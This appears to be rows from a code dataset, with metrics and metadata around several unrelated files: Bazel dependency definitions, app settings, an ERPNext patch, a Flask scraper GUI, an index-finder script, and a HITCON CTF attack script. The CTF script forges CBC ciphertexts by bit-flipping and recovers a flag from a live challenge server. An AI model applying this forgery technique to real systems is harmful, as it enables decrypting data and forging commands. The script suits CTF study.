| 0.026119
| false
| 0
| 0.029851
| 0
| 0.089552
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ee6793056d92226902cff484562e9055263810e1
| 10,325
|
bzl
|
Python
|
config/bazel/repositories.bzl
|
nala-cub/coda
|
581608cfc4d9b485182c6f5f40dd2ab7540cec66
|
[
"Apache-2.0"
] | 1
|
2021-11-13T06:19:22.000Z
|
2021-11-13T06:19:22.000Z
|
config/bazel/repositories.bzl
|
nala-cub/coda
|
581608cfc4d9b485182c6f5f40dd2ab7540cec66
|
[
"Apache-2.0"
] | 1
|
2021-12-21T17:56:58.000Z
|
2021-12-21T18:16:27.000Z
|
config/bazel/repositories.bzl
|
nala-cub/coda
|
581608cfc4d9b485182c6f5f40dd2ab7540cec66
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2021 Cory Paik. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
""" Research repositories """
load("//tools:maybe_http.bzl", "http_archive")
def _clean_dep(x):
return str(Label(x))
def _py_repositories():
http_archive(
name = "pytoolz_toolz",
build_file = _clean_dep("//third_party:toolz.BUILD"),
sha256 = "5c6ebde36ec2ceb9d6b3946105ba10b25237a67daee4eb80d62c508b9c4c2f55",
strip_prefix = "toolz-0.11.1",
urls = [
"https://github.com/pytoolz/toolz/archive/0.11.1.tar.gz",
],
)
http_archive(
name = "pytoolz_cytoolz",
build_file = _clean_dep("//third_party:cytoolz.BUILD"),
sha256 = "dba4a9d95e49f4f3cb5c41937f55dffe600aca5a7e640e3c2a56d9224923d7bb",
strip_prefix = "cytoolz-0.11.0",
urls = [
"https://github.com/pytoolz/cytoolz/archive/0.11.0.tar.gz",
],
)
http_archive(
name = "dm_tensor_annotations",
build_file = _clean_dep("//third_party:tensor_annotations.BUILD"),
patch_args = ["-p1"],
patches = [Label("//third_party:tensor_annotations.patch")],
sha256 = "d0a932efa70b1465860b14b5bbaf9b8eae8666133b28e74eaebdec9f30053f39",
strip_prefix = "tensor_annotations-b24a6213d20e806d9f06f4af9e0c0d1707b26d3e",
urls = [
"https://github.com/deepmind/tensor_annotations/archive/b24a6213d20e806d9f06f4af9e0c0d1707b26d3e.tar.gz",
],
)
http_archive(
name = "python_typeshed",
build_file = _clean_dep("//third_party:typeshed.BUILD"),
sha256 = "804110a0f0224f9f59d1854e6e9dd20157a899fcf1cd61f2376f29e2663a6c3e",
strip_prefix = "typeshed-53087be4eb935e5db24e9dddad3567ecaf1909a7",
urls = [
"https://github.com/python/typeshed/archive/53087be4eb935e5db24e9dddad3567ecaf1909a7.tar.gz",
],
)
http_archive(
name = "dm_rlax",
build_file = _clean_dep("//third_party:rlax.BUILD"),
sha256 = "d2283be962dc697882ff371813c64220a2c34a5538ca017d5bf699848426be3f",
strip_prefix = "rlax-4e8aeed362d65ebb80bac162f09994c322c966a1",
urls = ["https://github.com/deepmind/rlax/archive/4e8aeed362d65ebb80bac162f09994c322c966a1.tar.gz"],
)
http_archive(
name = "dm_optax",
build_file = _clean_dep("//third_party:optax.BUILD"),
sha256 = "39a48c13be5e8259656dc7ed613dceaea9b205e1927b8b87db3c0e8181f18739",
strip_prefix = "optax-0.0.9",
urls = ["https://github.com/deepmind/optax/archive/v0.0.9.tar.gz"],
)
http_archive(
name = "dm_chex",
build_file = _clean_dep("//third_party:chex.BUILD"),
sha256 = "d6a2410d77879e0f768cb0796f3156c78627a28ef6362ac725582b77af32ca64",
strip_prefix = "chex-fb7924766dec32cc9201149b66908545b44d03a9",
urls = ["https://github.com/deepmind/chex/archive/fb7924766dec32cc9201149b66908545b44d03a9.tar.gz"],
)
http_archive(
name = "com_google_flax",
build_file = _clean_dep("//third_party:flax.BUILD"),
sha256 = "b0da699b317fe028f6b0ae94174ec0a17ca376a79ca0a48e5b106ee7070d849c",
strip_prefix = "flax-0.3.5",
urls = ["https://github.com/google/flax/archive/v0.3.5.tar.gz"],
)
http_archive(
name = "dm_tree",
build_file = _clean_dep("//third_party:tree.BUILD"),
sha256 = "542449862e600e50663128a31cd4e262880f423f8bc66a64748f9bb20762cfbe",
strip_prefix = "tree-42e87fda83278e2eb32bb55225e1d1511e77c10c",
urls = ["https://github.com/deepmind/tree/archive/42e87fda83278e2eb32bb55225e1d1511e77c10c.tar.gz"],
)
http_archive(
name = "dm_fancyflags",
build_file = _clean_dep("//third_party:fancyflags.BUILD"),
sha256 = "19805c12d7512c9e2806c0a6fea352381b4718e25d94d94960e8f3e61e3e4ab2",
strip_prefix = "fancyflags-2e13d9818fb41dbb4476c4ebbcfe5f5a35643ef0",
url = "https://github.com/deepmind/fancyflags/archive/2e13d9818fb41dbb4476c4ebbcfe5f5a35643ef0.tar.gz",
)
http_archive(
name = "hf_transformers",
build_file = _clean_dep("//third_party/py:transformers.BUILD"),
patch_args = ["-p1"],
patches = [_clean_dep("//third_party/py:transformers.patch")],
sha256 = "30d9e30583e47680fd7b9809138c4cd83166fa0770f0113a1e06c3f65b848b4d",
strip_prefix = "transformers-4.10.3",
urls = [
"https://github.com/huggingface/transformers/archive/v4.10.3.tar.gz",
],
)
def _coda_repositories():
http_archive(
name = "com_github_openai_clip",
build_file = _clean_dep("//third_party:clip.BUILD"),
sha256 = "8949674a42169c92bd1b280b895a8ecdd7e3fe922878f0d8ea8521e09b9e5141",
strip_prefix = "CLIP-e184f608c5d5e58165682f7c332c3a8b4c1545f2",
urls = ["https://github.com/openai/CLIP/archive/e184f608c5d5e58165682f7c332c3a8b4c1545f2.tar.gz"],
)
http_archive(
name = "com_github_willwhitney_reprieve",
build_file = _clean_dep("//third_party:reprieve.BUILD"),
sha256 = "5d8e3ae90582a82f5e1f9dc65b007e9556048c2c728e85c8c4d80fa82258794a",
strip_prefix = "reprieve-004e09a37e3c595c450ab05342cd779fa28be462",
urls = ["https://github.com/willwhitney/reprieve/archive/004e09a37e3c595c450ab05342cd779fa28be462.tar.gz"],
)
def research_repositories():
""" Research repositories """
# Override tensorflow @rules_python version. As of 2021-09-21, the only
# target for which tensorflow uses @rules_python is:
# @org_tensorflow//tensorflow/platform/python/platform:platform
# This uses @rules_python//python/runfiles, which still exists in v0.4.0.
http_archive(
name = "rules_python",
sha256 = "954aa89b491be4a083304a2cb838019c8b8c3720a7abb9c4cb81ac7a24230cea",
urls = [
"https://mirror.bazel.build/github.com/bazelbuild/rules_python/releases/download/0.4.0/rules_python-0.4.0.tar.gz",
"https://github.com/bazelbuild/rules_python/releases/download/0.4.0/rules_python-0.4.0.tar.gz",
],
)
############################################################################
# JAX & Tensoflow
http_archive(
name = "org_tensorflow",
patch_args = ["-p1"],
patches = [
"@com_google_jax//third_party:tensorflow.patch",
Label("//third_party:tensorflow-sqlite.patch"),
Label("//third_party:tensorflow-pyconfig.patch"),
],
sha256 = "6b14b66a74728736359afcb491820fa3e713ea4a74bff0defe920f3453a3a0f0",
strip_prefix = "tensorflow-b5b1ff47ad250c3e38dcadef5f6bc414b0a533ee",
urls = [
"https://github.com/tensorflow/tensorflow/archive/b5b1ff47ad250c3e38dcadef5f6bc414b0a533ee.tar.gz",
],
)
http_archive(
name = "com_google_jax",
sha256 = "a2f6e35e0d1b5d2bed88e815d27730338072601003fce93e6c49442afa3d8d96",
strip_prefix = "jax-c3bacb49489aac6eb565611426022b3dd2a430fa",
urls = [
"https://github.com/corypaik/jax/archive/c3bacb49489aac6eb565611426022b3dd2a430fa.tar.gz",
],
)
############################################################################
http_archive(
name = "bazel_gazelle",
sha256 = "62ca106be173579c0a167deb23358fdfe71ffa1e4cfdddf5582af26520f1c66f",
urls = [
"https://mirror.bazel.build/github.com/bazelbuild/bazel-gazelle/releases/download/v0.23.0/bazel-gazelle-v0.23.0.tar.gz",
"https://github.com/bazelbuild/bazel-gazelle/releases/download/v0.23.0/bazel-gazelle-v0.23.0.tar.gz",
],
)
http_archive(
name = "com_github_bazelbuild_buildtools",
sha256 = "b8b69615e8d9ade79f3612311b8d0c4dfe01017420c90eed11db15e9e7c9ff3c",
strip_prefix = "buildtools-4.2.1",
url = "https://github.com/bazelbuild/buildtools/archive/4.2.1.tar.gz",
)
# we rely on dbx_build_tools for the inbuild python interpreter deps.
http_archive(
name = "dbx_build_tools",
patch_args = ["-p1"],
sha256 = "151b77cf5d1b06884bc2da350322e33ef5289237622196467988894c57616a0c",
strip_prefix = "dbx_build_tools-a5ae53031f11d9114cdbc40da8a84b5d28af58f7",
urls = ["https://github.com/dropbox/dbx_build_tools/archive/a5ae53031f11d9114cdbc40da8a84b5d28af58f7.tar.gz"],
)
http_archive(
name = "facebook_zstd",
build_file_content = """exports_files(["zstd"])""",
patch_cmds = ["make zstd"],
sha256 = "5194fbfa781fcf45b98c5e849651aa7b3b0a008c6b72d4a0db760f3002291e94",
strip_prefix = "zstd-1.5.0",
urls = ["https://github.com/facebook/zstd/releases/download/v1.5.0/zstd-1.5.0.tar.gz"],
)
http_archive(
name = "io_bazel_stardoc",
sha256 = "cd3d1e483eddf9f73db2bd466f329e1d10d65492272820eda57540767c902fe2",
strip_prefix = "stardoc-0.5.0",
urls = ["https://github.com/bazelbuild/stardoc/archive/0.5.0.tar.gz"],
)
# Overwrite @dbx_build_tools version of cpython3.8. Note that we use the
# same version, just with a different BUILD file. We could (and used to)
# just use a patch, but it becomes frustrating to make fixes and we'd like
# to avoid another having yet another submodule.
http_archive(
name = "org_python_cpython_38",
build_file = _clean_dep("//third_party/cpython:python38.BUILD"),
sha256 = "75894117f6db7051c1b34f37410168844bbb357c139a8a10a352e9bf8be594e8",
strip_prefix = "Python-3.8.1",
urls = ["https://www.python.org/ftp/python/3.8.1/Python-3.8.1.tar.xz"],
)
_py_repositories()
# for specific projects
_coda_repositories()
| 43.200837
| 132
| 0.670799
| 980
| 10,325
| 6.880612
| 0.240816
| 0.03752
| 0.04894
| 0.04538
| 0.22008
| 0.159128
| 0.067477
| 0.049533
| 0.042118
| 0.042118
| 0
| 0.197186
| 0.194479
| 10,325
| 238
| 133
| 43.382353
| 0.613563
| 0.127554
| 0
| 0.243243
| 0
| 0.07027
| 0.5707
| 0.306724
| 0
| 0
| 0
| 0
| 0
| 1
| 0.021622
| false
| 0
| 0
| 0.005405
| 0.027027
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ee699a71ac54286cafed23dd6c6819d85173b00b
| 3,051
|
py
|
Python
|
app/core/settings/settings.py
|
Radarslan/stocks
|
d0a1ca0808b5ac13c0ade4461832c1fb9bac8f0f
|
[
"MIT"
] | null | null | null |
app/core/settings/settings.py
|
Radarslan/stocks
|
d0a1ca0808b5ac13c0ade4461832c1fb9bac8f0f
|
[
"MIT"
] | null | null | null |
app/core/settings/settings.py
|
Radarslan/stocks
|
d0a1ca0808b5ac13c0ade4461832c1fb9bac8f0f
|
[
"MIT"
] | null | null | null |
import json
import logging
import sys
from decouple import config
# general
ENVIRONMENT: str = config("ENVIRONMENT", "docker")
API_VERSION: str = config("API_VERSION", "/api")
PROJECT_NAME: str = config("PROJECT_NAME", "Stocks")
BACKEND_CORS_ORIGINS: str = config("BACKEND_CORS_ORIGINS", "*")
DATETIME_FORMAT = "%Y-%m-%d %H:%M:%S"
# logging
MILLISECONDS_LENGTH = 3
MODULE_NAME_LENGTH = 20
LINE_NUMBER_LENGTH = 5
LOGGING_LEVEL_NAME_LENGTH = 8
LOG_FORMAT = (
f"[%(asctime)s"
f".%(msecs){MILLISECONDS_LENGTH}d] "
f"[%(module){MODULE_NAME_LENGTH}s] "
f"[%(lineno){LINE_NUMBER_LENGTH}d] "
f"[%(levelname){LOGGING_LEVEL_NAME_LENGTH}s]: "
f"%(message)s"
)
logging.basicConfig(
datefmt=DATETIME_FORMAT,
format=LOG_FORMAT,
level=logging.DEBUG,
stream=sys.stdout,
force=True,
)
# time periods
HALF_AN_HOUR = 1800
# database
DATABASE_PASSWORD: str = config("DATABASE_PASSWORD", "gibberish")
DATABASE_HOST: str = config(
"DATABASE_HOST", "database" if ENVIRONMENT == "docker" else "127.0.0.1"
)
DATABASE_PORT: int = config("DATABASE_PORT", 5005, cast=int)
DATABASE_NAME: int = config("DATABASE_NAME", 0, cast=int)
TIME_TO_LIVE_IN_SECONDS: int = config(
"TIME_TO_LIVE_IN_SECONDS", HALF_AN_HOUR, cast=int
)
# sockets
BINANCE_WEB_SOCKET_URL: str = config(
"BINANCE_WEB_SOCKET_URL",
"wss://stream.binance.com:9443/stream?streams=!miniTicker@arr",
)
SOCKET_MESSAGE_LENGTH: int = config("SOCKET_MESSAGE_LENGTH", 4096, cast=int)
SOCKET_DISCONNECT_MESSAGE: str = config(
"SOCKET_DISCONNECT_MESSAGE", "DISCONNECTED!"
)
ENCODING_FORMAT: str = "utf-8"
LOCAL_APP_CFG = """
{
"SOCKET_CONNECTIONS": [
{
"url_slug": "dxfeed",
"source_type": "dxfeed",
"HOST": "127.0.0.1",
"PORT": 1234
},
{
"url_slug": "dxfeed",
"source_type": "mc_fix",
"HOST": "127.0.0.1",
"PORT": 4321
}
]
}
"""
LOCAL_APP_CFG = """
{
"SOCKET_CONNECTIONS": [
{
"url_slug": "dxfeed",
"source_type": "dxfeed",
"HOST": "127.0.0.1",
"PORT": 1234
},
{
"url_slug": "dxfeed",
"source_type": "mc_fix",
"HOST": "127.0.0.1",
"PORT": 4321
}
]
}
"""
APP_CFG = config("APP_CFG", LOCAL_APP_CFG)
try:
if ENVIRONMENT == "localhost":
SOCKET_CONNECTIONS = json.loads(LOCAL_APP_CFG).get(
"SOCKET_CONNECTIONS"
)
else:
SOCKET_CONNECTIONS = json.loads(APP_CFG).get("SOCKET_CONNECTIONS")
SOCKET_SOURCE_TYPES = {
f"{connection.get('PORT')}": connection.get("source_type")
for connection in SOCKET_CONNECTIONS
}
except Exception as e:
logging.error("failed to get socket connections configuration")
logging.error(e)
sys.exit(1)
# data validation
ASSET_DECIMAL_PLACES = 10
| 25.855932
| 76
| 0.59587
| 356
| 3,051
| 4.837079
| 0.342697
| 0.041812
| 0.014518
| 0.017422
| 0.192799
| 0.140534
| 0.140534
| 0.140534
| 0.140534
| 0.140534
| 0
| 0.032129
| 0.265487
| 3,051
| 117
| 77
| 26.076923
| 0.736278
| 0.019993
| 0
| 0.22
| 0
| 0
| 0.488099
| 0.119343
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.01
| 0.04
| 0
| 0.04
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ee6e8e289a9de7e4f9d0b9c903a761ab4c91411d
| 4,049
|
py
|
Python
|
Gathered CTF writeups/2017-11-04-hitcon/secret_server/attack.py
|
mihaid-b/CyberSakura
|
f60e6b6bfd6898c69b84424b080090ae98f8076c
|
[
"MIT"
] | 1
|
2022-03-27T06:00:41.000Z
|
2022-03-27T06:00:41.000Z
|
Gathered CTF writeups/2017-11-04-hitcon/secret_server/attack.py
|
mihaid-b/CyberSakura
|
f60e6b6bfd6898c69b84424b080090ae98f8076c
|
[
"MIT"
] | null | null | null |
Gathered CTF writeups/2017-11-04-hitcon/secret_server/attack.py
|
mihaid-b/CyberSakura
|
f60e6b6bfd6898c69b84424b080090ae98f8076c
|
[
"MIT"
] | 1
|
2022-03-27T06:01:42.000Z
|
2022-03-27T06:01:42.000Z
|
import base64
import hashlib
import re
import string
import itertools
from crypto_commons.netcat.netcat_commons import receive_until_match, nc, send, receive_until
from crypto_commons.symmetrical.symmetrical import set_byte_cbc, set_cbc_payload_for_block
def PoW(suffix, digest):
for prefix in itertools.product(string.ascii_letters + string.digits, repeat=4):
p = "".join(prefix)
if hashlib.sha256(p + suffix).hexdigest() == digest:
return p
def pad(msg):
pad_length = 16 - len(msg) % 16
return msg + chr(pad_length) * pad_length
def generate_payload_from_message(encrypted, plaintext, new_payload):
raw = encrypted.decode("base64")
new_payload = pad(new_payload)[:16]
plaintext = ("\0" * 16) + (pad(plaintext)[:16])
payload = set_cbc_payload_for_block(raw, plaintext, new_payload, 1)
return base64.b64encode(payload)
def main():
s = nc("52.193.157.19", 9999)
data = receive_until_match(s, "Give me XXXX:")
inputs = re.findall("SHA256\(XXXX\+(.*)\) == (.*)", data)[0]
suffix = inputs[0]
digest = inputs[1]
result = PoW(suffix, digest)
print("PoW done")
send(s, result)
receive_until_match(s, "Done!\n")
welcome = receive_until(s, "\n")[:-1]
get_flag_payload = generate_payload_from_message(welcome, "Welcome!", "get-flag")
send(s, get_flag_payload)
encrypted_flag = receive_until(s, "\n")[:-1]
raw_enc_flag = encrypted_flag.decode("base64")
current = "hitcon{"
print('encrypted flag', encrypted_flag, encrypted_flag.decode("base64"), len(encrypted_flag.decode("base64")))
for block_to_recover in range(3):
malleable_block = base64.b64encode(raw_enc_flag[block_to_recover * 16:])
missing = 16 - len(current)
for spaces in range(missing):
for c in string.printable:
test_flag_block_prefix = current + c + ("\0" * (missing - spaces))
expected_command = (" " * spaces) + "get-flag"
payload = generate_payload_from_message(malleable_block, test_flag_block_prefix, expected_command)
send(s, payload)
result = receive_until(s, "\n")[:-1]
if result == encrypted_flag:
current += c
print('found matching flag char:', current)
break
print(current)
known_blocks = raw_enc_flag[16 * block_to_recover:16 * block_to_recover + 32]
expanded_flag = raw_enc_flag[16 * block_to_recover:] + known_blocks # appending IV and "Welcome!!" at the end
next_block_known = ""
for i in range(8):
get_md5 = set_cbc_payload_for_block(expanded_flag, "\0" * 16 + current, (" " * 9) + "get-md5", 1) # first block is get-md5
get_md5 = set_byte_cbc(get_md5, ("\0" * (5 - block_to_recover) * 16) + current,
(6 - block_to_recover) * 16 - 1, chr((4 - block_to_recover) * 16 - i - 1)) # last character to cut padding
send(s, base64.b64encode(get_md5))
real_md5_result = receive_until(s, "\n")[:-1]
for c in string.printable:
test_md5_payload = set_cbc_payload_for_block(expanded_flag, "\0" * 16 + current,
(" " * (8 - i - 1)) + "get-md5" + next_block_known + c, 1)
test_md5_payload = set_byte_cbc(test_md5_payload, ("\0" * (5 - block_to_recover) * 16) + current,
(6 - block_to_recover) * 16 - 1,
chr((4 - block_to_recover) * 16 + 1))
send(s, base64.b64encode(test_md5_payload))
test_md5_result = receive_until(s, "\n")[:-1]
if real_md5_result == test_md5_result:
next_block_known += c
print('found matching flag char:', next_block_known)
break
print(next_block_known)
current = next_block_known[:-1]
main()
| 44.988889
| 141
| 0.594221
| 513
| 4,049
| 4.415205
| 0.231969
| 0.033996
| 0.067991
| 0.056512
| 0.29404
| 0.245475
| 0.184106
| 0.093598
| 0.093598
| 0.093598
| 0
| 0.046005
| 0.285997
| 4,049
| 89
| 142
| 45.494382
| 0.737461
| 0.022722
| 0
| 0.051948
| 0
| 0
| 0.057425
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.051948
| false
| 0
| 0.090909
| 0
| 0.181818
| 0.103896
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ee709ac2d49de9a25f6994afec04b8339c1c352a
| 1,952
|
py
|
Python
|
mindhome_alpha/erpnext/patches/v11_0/make_asset_finance_book_against_old_entries.py
|
Mindhome/field_service
|
3aea428815147903eb9af1d0c1b4b9fc7faed057
|
[
"MIT"
] | 1
|
2021-04-29T14:55:29.000Z
|
2021-04-29T14:55:29.000Z
|
mindhome_alpha/erpnext/patches/v11_0/make_asset_finance_book_against_old_entries.py
|
Mindhome/field_service
|
3aea428815147903eb9af1d0c1b4b9fc7faed057
|
[
"MIT"
] | null | null | null |
mindhome_alpha/erpnext/patches/v11_0/make_asset_finance_book_against_old_entries.py
|
Mindhome/field_service
|
3aea428815147903eb9af1d0c1b4b9fc7faed057
|
[
"MIT"
] | 1
|
2021-04-29T14:39:01.000Z
|
2021-04-29T14:39:01.000Z
|
# Copyright (c) 2017, Frappe and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import frappe
from frappe.utils.nestedset import rebuild_tree
def execute():
frappe.reload_doc('assets', 'doctype', 'asset_finance_book')
frappe.reload_doc('assets', 'doctype', 'depreciation_schedule')
frappe.reload_doc('assets', 'doctype', 'asset_category')
frappe.reload_doc('assets', 'doctype', 'asset')
frappe.reload_doc('assets', 'doctype', 'asset_movement')
frappe.reload_doc('assets', 'doctype', 'asset_category_account')
if frappe.db.has_column("Asset", "warehouse"):
frappe.db.sql(""" update `tabAsset` ast, `tabWarehouse` wh
set ast.location = wh.warehouse_name where ast.warehouse = wh.name""")
for d in frappe.get_all('Asset'):
doc = frappe.get_doc('Asset', d.name)
if doc.calculate_depreciation:
fb = doc.append('finance_books', {
'depreciation_method': doc.depreciation_method,
'total_number_of_depreciations': doc.total_number_of_depreciations,
'frequency_of_depreciation': doc.frequency_of_depreciation,
'depreciation_start_date': doc.next_depreciation_date,
'expected_value_after_useful_life': doc.expected_value_after_useful_life,
'value_after_depreciation': doc.value_after_depreciation
})
fb.db_update()
frappe.db.sql(""" update `tabDepreciation Schedule` ds, `tabAsset` ast
set ds.depreciation_method = ast.depreciation_method, ds.finance_book_id = 1 where ds.parent = ast.name """)
for category in frappe.get_all('Asset Category'):
asset_category_doc = frappe.get_doc("Asset Category", category)
row = asset_category_doc.append('finance_books', {
'depreciation_method': asset_category_doc.depreciation_method,
'total_number_of_depreciations': asset_category_doc.total_number_of_depreciations,
'frequency_of_depreciation': asset_category_doc.frequency_of_depreciation
})
row.db_update()
| 43.377778
| 111
| 0.76332
| 252
| 1,952
| 5.579365
| 0.31746
| 0.083215
| 0.064011
| 0.089616
| 0.440256
| 0.325036
| 0.199147
| 0.073969
| 0
| 0
| 0
| 0.003488
| 0.118852
| 1,952
| 45
| 112
| 43.377778
| 0.813953
| 0.050717
| 0
| 0.057143
| 0
| 0.028571
| 0.403566
| 0.149109
| 0
| 0
| 0
| 0
| 0
| 1
| 0.028571
| false
| 0
| 0.085714
| 0
| 0.114286
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ee70bc7fa006c6b656696699e7b20490a6b297e1
| 1,709
|
py
|
Python
|
gui/web.py
|
irfanchahyadi/Scraping-komikid
|
79db8f4e617b489a31f4c0161d665e0d3bd47d07
|
[
"MIT"
] | 3
|
2021-06-20T15:26:42.000Z
|
2021-09-13T08:20:47.000Z
|
gui/web.py
|
irfanchahyadi/Scraping-komikid
|
79db8f4e617b489a31f4c0161d665e0d3bd47d07
|
[
"MIT"
] | 1
|
2021-11-20T11:09:41.000Z
|
2021-11-20T11:09:41.000Z
|
gui/web.py
|
irfanchahyadi/Scraping-komikid
|
79db8f4e617b489a31f4c0161d665e0d3bd47d07
|
[
"MIT"
] | 2
|
2021-09-04T11:49:13.000Z
|
2021-11-03T11:01:47.000Z
|
"""
Web GUI
Author: Irfan Chahyadi
Source: github.com/irfanchahyadi/Scraping-Manga
"""
# IMPORT REQUIRED PACKAGE
from flask import Flask, render_template, request, redirect, url_for, Response
import os, webbrowser, time
from gui import web_api
import main
app = Flask(__name__)
@app.route('/tes')
def tes():
return render_template('index2.html')
@app.route('/')
def home():
manga = web_api.get_manga()
lang = web_api.get_lang()
return render_template('index.html', data={'manga': manga, 'lang': lang})
@app.route('/crawl/<path:id_lang>')
def crawl(id_lang):
id, lang_id = id_lang.split('_')
web_api.get(id, lang_id)
return redirect(url_for('home'))
@app.route('/stop_crawl')
def stop_crawl():
web_api.stop()
return ('', 204)
@app.route('/shutdown')
def shutdown():
shutdown_server()
return "Bye, see other project on <a href='https://github.com/irfanchahyadi'>github.com/irfanchahyadi</a>"
def shutdown_server():
func = request.environ.get('werkzeug.server.shutdown')
if func is None:
raise RuntimeError('Not running with the Werkzeug Server')
func()
@app.route('/progress')
def progress():
def generate():
x = 0
while x <= 200:
yield 'data: {"now":' + str(main.crawl_now) + ', "end":' + str(main.crawl_end) + ', "manga":"' + main.crawl_manga + '"}\n\n'
x = x + 1
time.sleep(0.5)
return Response(generate(), mimetype='text/event-stream')
@app.route('/new_manga', methods=['POST'])
def new_manga():
form = request.form.to_dict()
imageFile = request.files['imageFile']
web_api.add_manga(form, imageFile)
return redirect(url_for('home'))
webbrowser.open_new_tab('http://localhost:5000/')
app.run(host='0.0.0.0')
| 24.768116
| 136
| 0.675834
| 245
| 1,709
| 4.563265
| 0.420408
| 0.050089
| 0.059034
| 0.035778
| 0.042934
| 0
| 0
| 0
| 0
| 0
| 0
| 0.013076
| 0.149795
| 1,709
| 68
| 137
| 25.132353
| 0.756366
| 0.060269
| 0
| 0.041667
| 0
| 0.020833
| 0.22417
| 0.028178
| 0
| 0
| 0
| 0
| 0
| 1
| 0.1875
| false
| 0
| 0.083333
| 0.020833
| 0.416667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ee7114274f05df3d5f9b0b4f95761fdb8ac8dbcd
| 4,144
|
py
|
Python
|
Python/index_finder.py
|
jgruselius/misc
|
ae4aa6c72cebed1ef0160f95488e3827fbf706c9
|
[
"Apache-2.0"
] | 1
|
2018-09-28T12:12:17.000Z
|
2018-09-28T12:12:17.000Z
|
Python/index_finder.py
|
jgruselius/misc
|
ae4aa6c72cebed1ef0160f95488e3827fbf706c9
|
[
"Apache-2.0"
] | null | null | null |
Python/index_finder.py
|
jgruselius/misc
|
ae4aa6c72cebed1ef0160f95488e3827fbf706c9
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python3
# Author: Joel Gruselius, Dec 2018
# Script for checking index clashes
# Input one or several nucleotide sequences and print any matches found in
# the index reference file. This version is only good for checking for
# full matches.
# It is pretty useful though to list overlapping indexes in the reference file.
# Usage:
# index_finder --ref <reference_list> <index_seq>...
# TODO: Show sequences matching the first six bases not just complete matches
# TODO: Specify cache dir
import sys
import argparse
import re
import hashlib
import json
import os
import errno
COMPL_MAP = {"A": "T", "T": "A", "C": "G", "G": "C"}
def file_hash(path):
BUF_SIZE = 65536
md5_hash = hashlib.md5()
with open(path, "rb") as f:
data = f.read(BUF_SIZE)
while data:
md5_hash.update(data)
data = f.read(BUF_SIZE)
return md5_hash.hexdigest()
def rev(seq):
return seq[::-1]
def compl(seq):
c = [COMPL_MAP[nt] for nt in seq]
return "".join(c)
def rev_compl(seq):
rc = [COMPL_MAP[nt] for nt in seq[::-1]]
return "".join(rc)
# Build a dict of know index sequences from a text file:
def build_index_dict(path, length):
ref_dict = {}
if length is None:
seq_pattern = re.compile(r"(?<![ATCG])[ATCGN]{4,}")
else:
seq_pattern = re.compile(r"(?<![ATCG])[ATCGN]{{{}}}".format(length))
with open(path, "r") as ref:
for line in ref:
match = set(seq_pattern.findall(line))
if match:
for m in match:
ref_dict.setdefault(m, []).append(line.strip())
return ref_dict
def load_index_dict(path):
with open(path, "r") as f:
d = json.load(f)
return d
def save_index_dict(obj, path):
with open(path, "w") as f:
json.dump(obj, f)
def print_index_dict(ref_dict):
for seq, matches in ref_dict.items():
if len(matches) > 1:
print(seq)
for match in matches:
print("\t{}".format(match))
def main(args):
if not os.path.isfile(args.ref):
# File not found
raise OSError(errno.ENOENT, os.strerror(errno.ENOENT), args.ref)
md5 = file_hash(args.ref)
cache = "{}{}.json".format(md5, args.length or "")
if not args.rebuild and os.path.isfile(cache):
print("Loading cached index dict ({})".format(cache), file=sys.stderr)
ref_dict = load_index_dict(cache)
else:
ref_dict = build_index_dict(args.ref, args.length)
print("Caching index dict ({})".format(cache), file=sys.stderr)
save_index_dict(ref_dict, cache)
if args.list:
print_index_dict(ref_dict)
n = 0
for x in ref_dict.values():
n += len(x)
print("\nTotal barcodes parsed in reference dict: {}".format(n))
print("Unique barcodes in reference dict: {}".format(len(ref_dict)))
else:
for arg in args.seqs:
if args.length:
seq = arg[:args.length]
else:
seq = arg
if seq in ref_dict:
matches = ref_dict[seq]
print("{} found in:".format(seq))
for m in matches:
print("\t{}".format(m))
else:
print("{}: No matches found".format(seq))
if __name__ == "__main__":
p = argparse.ArgumentParser(description="Find index clashes")
